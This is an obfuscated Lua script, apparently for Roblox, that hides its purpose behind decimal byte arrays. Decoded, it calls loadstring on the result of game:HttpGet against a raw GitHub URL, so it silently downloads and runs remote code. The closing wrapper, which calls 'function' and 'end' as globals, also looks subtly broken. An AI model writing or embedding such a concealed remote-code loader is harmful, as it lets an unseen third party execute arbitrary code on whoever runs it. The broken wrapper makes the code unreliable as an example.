local function _G_ObF_DeC(t) local r = {} for i = 1, #t do r[i] = string.char(t[i]) end return table.concat(r) end

local _SP = {
    [1] = {112,99,97,108,108},
    [2] = {102,117,110,99,116,105,111,110},
    [3] = {108,111,97,100,115,116,114,105,110,103},
    [4] = {103,97,109,101},
    [5] = {72,116,116,112,71,101,116},
    [6] = {104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,108,97,106,100,110,101,104,106,97,105,47,97,105,110,100,98,97,106,97,107,100,110,110,100,47,109,97,105,110,47,105,97,110,100,110,106,97,107,97,110,98,100,98,101},
    [7] = {101,110,100}
}

local _0xA1B2C3 = _G_ObF_DeC(_SP[1])
local _0xD4E5F6 = _G_ObF_DeC(_SP[2])
local _0xG7H8I9 = _G_ObF_DeC(_SP[3])
local _0xJ0K1L2 = _G_ObF_DeC(_SP[4])
local _0xM3N4O5 = _G_ObF_DeC(_SP[5])
local _0xP6Q7R8 = _G_ObF_DeC(_SP[6])
local _0xS9T0U1 = _G_ObF_DeC(_SP[7])

local function _0xV2W3X4()
    return getfenv()[_0xG7H8I9](getfenv()[_0xJ0K1L2][_0xM3N4O5](_0xP6Q7R8))()
end

getfenv()[_0xA1B2C3](getfenv()[_0xD4E5F6]()
    _0xV2W3X4()
getfenv()[_0xS9T0U1])
